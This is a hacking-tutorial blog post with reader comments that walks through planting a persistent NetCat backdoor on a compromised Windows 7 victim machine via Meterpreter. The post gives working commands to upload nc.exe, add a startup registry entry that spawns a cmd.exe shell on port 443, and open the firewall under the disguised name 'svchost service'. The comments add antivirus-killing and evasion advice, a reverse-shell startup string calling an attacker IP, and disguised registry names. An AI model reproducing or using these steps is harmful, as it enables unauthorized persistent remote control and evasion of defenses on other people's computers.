• 7,615
  • 91
  • +426
  • 429
10 Steps to Use NetCat as a Backdoor in Windows 7 System

10 Steps to Use NetCat as a Backdoor in Windows 7 System

Bookmark

Type : Tutorial

Level : Medium

O.S Target : Windows 7 ultimate

When an attacker successfully compromise a system they need to maintain the connection, that's why the attacker usually installing backdoor on victim computer for future use to make attacker easily connect to victim computer to use victim resource, and collecting data on victim computer.

Are you sure netcat can be used as a backdoor? yes sure of course :-) In this tutorial I will write down the technique to set up the famous listener application NetCat as a backdoor for Windows system when attacker successfully compromised victim computer and gaining meterpreter access.

This tutorial I will write based on gaining access using java signed applet exploit in my previous tutorial.

Requirements :

1. NetCat 2. Meterpreter Script (you can get meterpreter script when successfully compromise victim with selected payload)

10 Steps to Use NetCat as a Backdoor in Windows 7 System:

1. The first step you need to gain an access to victim computer and get a meterpreter script for the payload ( I'm using java signed applet from my previous tutorial).

10 Steps to Use NetCat as a Backdoor in Windows 7 System

2. The next step you need to upload your NetCat.exe to victim computer by using following command :

upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32

upload nc.exe and place it in C:\windows\system32 on victim computer

10 Steps to Use NetCat as a Backdoor in Windows 7 System

When it failed to upload(look the picture above), you need to escalate your privilege to system account (view the tutorial privilege escalation here). 3. When upload process successful it will shown like this :

10 Steps to Use NetCat as a Backdoor in Windows 7 System

4. The next step we need to configure the registry to make NetCat execute on Windows start up and listening on port 443. We do this by editing the key "HKLM\software\microsoft\windows\currentversion\run". Enumerate the supplied registry key :

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

10 Steps to Use NetCat as a Backdoor in Windows 7 System

5. Then add our NetCat into start up process by running this command :

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

Successful set nc.

6. To check our backdoor autorun process and make sure it already added on autorun list :

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc

10 Steps to Use NetCat as a Backdoor in Windows 7 System

7. Until this step everything looks okay, for the next step we need to alter the system to allow remote connections through the firewall to our netcat backdoor using netsh command and open port 443 . run shell command from meterpreter to access command prompt, and then run :

netsh advfirewall firewall add rule name="svchost service" dir=in action=allow protocol=TCP localport=443

10 Steps to Use NetCat as a Backdoor in Windows 7 System 8. When success add our firewall rule, let's check and make sure our new rule has been added or not by using this command :

netsh firewall show portopening

10 Steps to Use NetCat as a Backdoor in Windows 7 System

9. Yep everything has been set up so great until this step, now we will run our netcat to try connect to victim computer by running :

nc -v victim_ip_address port

10 Steps to Use NetCat as a Backdoor in Windows 7 System

10. Let's try our backdoor by restarting the victim computer by using reboot command from meterpreter or shutdown -r -t 00 from windows console and try again to connect using NetCat in step 9.

meterpreter > reboot

or

C:\windows\system32>shutdown -r -t 00

If our netcat show up a console, then we're successful inject a NetCat backdoor to victim computer.

Countermeasures :

1. When you have activated windows firewall, make sure you also have other personal firewall installed to detect inbound or outbound packet. Hope it's useful :-)

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • http://backtosecurity.com @Marts_McFly

    Nice tutorial.

    One thing is though that netcat gets detected by almost all AV vendors. So you will have to ‘killav’ in Meterpreter before uploading. But once the machine reboots nc.exe will get detected. One should use the new rcat.exe instead. It is wrapped to bypass AV http://packetstormsecurity.org/files/view/101512/rcat.zip

    One other thing is that the user will need port 443 opened and forwarding on their home modem/router/corperate-firewall to the victim’s box. This probably won’t be the case for the majority of users. A better strategy would be to set netcat in a reverse tunnel and tunnel OUT on 443 to your own box, opposed from trying to connect in. (This will bypass inbound ACLs at the gateway. Most home users will have UPnP enabled, and most companies would have outbound 443 open on their firewalls)

    • http://www.vishnuvalentino.com v4L

      #Marts_McFly
      Nice one mate, you’re right :-P I wrote this tutorial late night so I’m forget that what I set up was in victim computer..
      yep you’re also right to set up a reverse tunnel to our 443 was better :-)
      and also for antivirus, nc.exe was detected by antivirus, but what I want to told here was the concept about planting backdoor in victim computer…
      but anyhow, thank you for your input & corrections :-)

  • Christian

    Can you get a meterpreter shell by connecting to netcat ?

    • http://www.vishnuvalentino.com v4L

      #Christian
      no we can’t get it…if you want to get your meterpreter you can view this tutorial

  • Martebs

    Hello vish, Nice tutorial with pic….. I really like it ^^
     
    thanks for that

    • http://www.vishnuvalentino.com v4L

      #Martebs
      you’re welcome man.. :-)

  • http://c0nnect3d.blogspot.com c0nnect3d

    Good Tutorial … But what about manually adding netcat to Register ?
     
    Regards
    c0nnect3d
    http://c0nnect3d.blogspot.com

    • http://www.vishnuvalentino.com v4L

      #connect3d
      to add manually, try to open your regedit and add new string value here HKLM\software\microsoft\windows\currentversion\run with this value data "C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe"

  • http://c0nnect3d.blogspot.com c0nnect3d

    v4L,
    I know how to add it to registery… But It would be more better if you do this by command line. Actually when you pentest/hack a computer , generally you get Command Shell (not GUI).  Anyway, I will write a tutorial about this on my blog: c0nnect3d.blogpsot.com .
     
    Thanks for reply!!!
     
    Regards
    c0nnect3d
    www.c0nnect3d.blogspot.com

    • http://www.vishnuvalentino.com v4L

      #connect3d
      LoL…I thought you ask about manually add it without using cmd…. :-P
      it’s nice if you already got it…here’s if you want to run from cmd :
      reg add HKLM\software\microsoft\windows\currentversion\run /t REG_SZ -v SystemService -d "C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe"
      sorry for that :-)

  • ZeroAsterix

    So, in conclusion the best technique is to have this string in yr windows startup
    c:\windows\system32\rcat.exe -d 192.168.1.102 443 -e cmd.exe
    I applied the -d as a workaround to your quotes plus -h which didnt work for me I dont know why but it just wouldnt run in windows7 maybe you can explain why?
    here are some limitations i see with this setup that we might address:
    1) a computer must already be listening at the appropriate address (in this example 192.168.1.102) at the exact moment the compromised computer boots up otherwise it will not send out the call again (until rebooted)
    2) once the connection is closed it will not be able to be re-opened until the compromised system reboots and only then
    thoughts anyone?

    • http://www.vishnuvalentino.com v4L

      #ZeroAsterix
      btw you wrote this c:\windows\system32\rcat.exe -d 192.168.1.102 443 -e cmd.exe
      FYI : this -d switches wasn’t rcat switch, but this one was for adding a registry value to windows…
      if you’re on meterpreter console, and already upload your rcat to victim machine you can follow the step no.5

      if you not use meterpreter and just got the victim console(but you already put your rcat on victim machine), then you can run this command to add new startup services…
      reg add HKLM\software\microsoft\windows\currentversion\run /t REG_SZ -v SystemService -d "C:\windows\system32\rcat.exe -Ldp 443 -e cmd.exe"
      where -v was the fake name(I use SystemService); and -d was the value and also location of your rcat

  • Pingback: Hacking Windows using Mozilla Firefox Addon Social Engineering | Vishnu Valentino Ethical Hacking Tutorial, Security Tips and Trick

  • AJ

    when i try and upload to the victim it says unknown command upload…what is wrong?

    • http://www.vishnuvalentino.com v4L

      #AJ
      did you use upload command inside meterpreter?

  • http://123 1212

    Bro i am getting problem in 7nth step when i write netsh advfirewall firewall add rule name=”svchost service” dir=in action=allow protocol=TCP localport=443

    it shows

    C:\WINDOWS\system32>netsh advfirewall firewall add rule name=”svchost service” dir=in action=allow protocol=TCP localport=443
    netsh advfirewall firewall add rule name=”svchost service” dir=in action=allow protocol=TCP localport=443
    The following command was not found: advfirewall firewall add rule “name=svchost service” dir=in action=allow protocol=TCP localport=443.

    plz help me bro

  • Thisara

    I can't add the firewall rule. Shell is not coming with Administrator privileges. How do i get the shell with administrator privileges. Please be kind enough to reply me asap.

    • isamael

      Yes, it’s true. This is because we are attacked a windows xp or seven. In other side, vista or 8, 100% functionable.
      Try netsh firewall add allowedprogram C:\nc.exe nc ENABLE

  • php

    thans 4 ur great Tutorial…. a request
    there is any way to send a file(malicious) just by knowing victim ip no more?? not by sending link or file and begging to open it…you know it s useful when victim is just online and u cant chat whit victim….

    • http://www.vishnuvalentino.com v4L

      #php

      if the system was vulnerable, yes you can, if no, you cannot

      • php

        i will be happy if u say how can i do it when the system is vulnerable…